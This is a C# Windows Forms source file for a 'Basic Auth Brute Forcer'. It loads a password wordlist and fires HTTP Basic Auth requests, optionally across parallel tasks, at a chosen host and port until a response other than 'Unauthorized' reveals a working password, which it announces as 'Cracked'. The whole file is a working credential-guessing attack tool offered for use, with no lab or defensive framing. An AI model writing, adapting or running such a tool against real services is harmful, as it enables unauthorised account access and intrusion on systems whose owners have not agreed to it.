﻿using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Text;
using System.Windows.Forms;
using System.Threading.Tasks;
using System.Web;
using System.Net;


namespace Basic_Auth_Brute_Forcer
{
    public partial class MainForm : Form
    {
        public MainForm()
        {
            InitializeComponent();
        }

        private void bgw_DoWork(object sender, DoWorkEventArgs e) // 1 thread means use this 
        {
            try
            {

                string method = "GET";
                string host, port, user, passlist;
                host = tbHost.Text;
                port = tbPort.Text;
                user = cbBasicAuthUsername.Text;
                passlist = tbUserList.Text;
                int timeout = this.TrackTimeout.Value;


                List<string> wordlist = new List<string>(); // multithreaded file IO is stupid. lets use a LIST instead
                foreach (string wordline in (ReadLines(passlist)))
                {
                    wordlist.Add(wordline);
                }
                


                foreach (string pass in wordlist)
                {
                    tbStatus.Text = "Working.....\r\nCurrent pass is " + pass;
                    if (!BasicAuthBrute(host, port, user, pass, timeout, method))
                    {
                        continue;

                    }
                    else
                    {
                        this.tbStatus.BackColor = Color.Green;
                        return;
                    }

                }
                // brute failed
                this.tbStatus.BackColor = Color.Red;
                this.tbStatus.Text = "Brute attempt failed!";

            }

            catch (Exception )
            {

            }
        }

        private void btnLoadPassList_Click(object sender, EventArgs e)
        {
            ofd.ShowDialog();
            this.tbUserList.Text = ofd.FileName;
        }

        private void btnStartBasicAuthBrute_Click(object sender, EventArgs e)
        {
            string method = "GET";
            string host, port, user, passlist;
            host = tbHost.Text;
            port = tbPort.Text;
            user = cbBasicAuthUsername.Text;
            passlist = tbUserList.Text;
            int timeout = this.TrackTimeout.Value;
            int noc = TrackConnections.Value;


            List<string> wordlist = new List<string>(); // multithreaded file IO is stupid. lets use a LIST instead
		    foreach(string wordline in (ReadLines(passlist)))
		    {
		    wordlist.Add(wordline);
		    }


            if (noc == 1)
            {
                bgw.RunWorkerAsync();
            }
            else // task factory for multiple instances!
            {
            int wordlistsize = wordlist.Count;
            int chunks = Convert.ToInt32(wordlistsize / noc);

            foreach (var chunk in Extensions.Chunk(wordlist, chunks))
            {
                for (int cnt = 0; cnt < noc; cnt++)
                {
                    Task.Factory.StartNew(() =>
                    {

                        foreach (string pass in chunk) // maybe start at a random position in the list, store in a used table? 
                        {
                            tbStatus.Text = "Working.....\r\nCurrent pass is " + pass;
                            if (!BasicAuthBrute(host, port, user, pass, timeout, method))
                            {
                                continue;

                            }
                            else
                            {
                                this.tbStatus.BackColor = Color.Green;
                                return;
                            }

                        }
                        // brute failed
                        this.tbStatus.BackColor = Color.Red;
                        this.tbStatus.Text = "Brute attempt failed!";

                    });
                }
            }
            }
            //http://stackoverflow.com/questions/10313185/dynamically-create-thread
            //http://stackoverflow.com/questions/4619874/dynamic-thread-and-label-creation
            //http://stackoverflow.com/questions/10969381/generate-new-threads-dynamically-using-c-sharp-net'
            //http://msdn.microsoft.com/en-us/library/ee256691.aspx
        }

        private void btnStopBasicAuthBrute_Click(object sender, EventArgs e)
        {
            System.Threading.Thread.Sleep(300); // sleep b4 kill
            if (bgw.WorkerSupportsCancellation)
            {
                bgw.CancelAsync();
                tbStatus.Text = "Stopped operations!";
                tbStatus.BackColor = Color.White;
            }
        }
        public static IEnumerable<string> ReadLines(string path)
        {
            using (System.IO.StreamReader reader = System.IO.File.OpenText(path))
            {
                string line;
                while ((line = reader.ReadLine()) != null)
                {
                    yield return line;
                }
            }
        }

        private bool BasicAuthBrute(string host, string port, string user, string pass, int timeout, string method)
        {
            // // this should be called (looped) for each password in list 
            string target = host + ":" + port;
            string authinfo = user + ":" + pass;
            int goodtimeout = timeout * 10000000;

            HttpWebRequest webreq = (HttpWebRequest)WebRequest.Create(target);
            // mess with timeout later this works 
            webreq.Credentials = new NetworkCredential(user, pass);
            webreq.Timeout = goodtimeout;
            webreq.ReadWriteTimeout = goodtimeout;
            webreq.ContentType = "application/x-www-form-urlencoded";
            webreq.UserAgent = tbUserAgent.Text;

            webreq.Method = method;
            //authinfo = Convert.ToBase64String(Encoding.Default.GetBytes(authinfo));
            //webreq.Headers["Authorization"] = "Basic " + authinfo;
            try
            {
                using (HttpWebResponse WebResp = (HttpWebResponse)webreq.GetResponse())
                {

                    System.IO.StreamReader sr = new System.IO.StreamReader(webreq.GetResponse().GetResponseStream());
                    string response = sr.ReadToEnd();
                    //MessageBox.Show(response);
                    //this.tbStatus.Text = "Cracked!!! Password is " + pass + " !";
                    return true;

                }
            }
            catch (WebException exe)
            {
                string exp = ((HttpWebResponse)exe.Response).StatusCode.ToString();
                if (exp == "Unauthorized")
                {
                    return false;
                }
                else
                {
                    MessageBox.Show(exp);
                    string status = "Cracked!!! Password is " + pass + " !";
                    MessageBox.Show(status);
                    //tbStatus.Invoke(new MethodInvoker(delegate { tbStatus.Text = status; }));
                    tbStatus.Text = status;
                    return true;
                }

            }
        }

        private void TrackConnections_Scroll(object sender, EventArgs e)
        {
            this.lblConnections.Text = this.TrackConnections.Value.ToString();
        }

        private void TrackTimeout_Scroll(object sender, EventArgs e)
        {
            lblTimeOut.Text = TrackTimeout.Value.ToString();
        }

        private void aboutToolStripMenuItem_Click(object sender, EventArgs e)
        {
            AboutMeForm lol = new AboutMeForm();
            lol.Show();
        }

        private void MainForm_Load(object sender, EventArgs e)
        {
            MainForm.CheckForIllegalCrossThreadCalls = false;
        }

        private void srslyHelpToolStripMenuItem_Click(object sender, EventArgs e)
        {
            MessageBox.Show("If theres a bug, email the dev, otherwise, this isn't rocket science");
        }


      
    }
    static class Extensions
    {
        public static IEnumerable<IEnumerable<T>> Chunk<T>(this IEnumerable<T> list, int chunkSize)
        {
            int i = 0;
            var chunks = from name in list
                         group name by i++ / chunkSize into part
                         select part.AsEnumerable();
            return chunks;
        }
    }
}
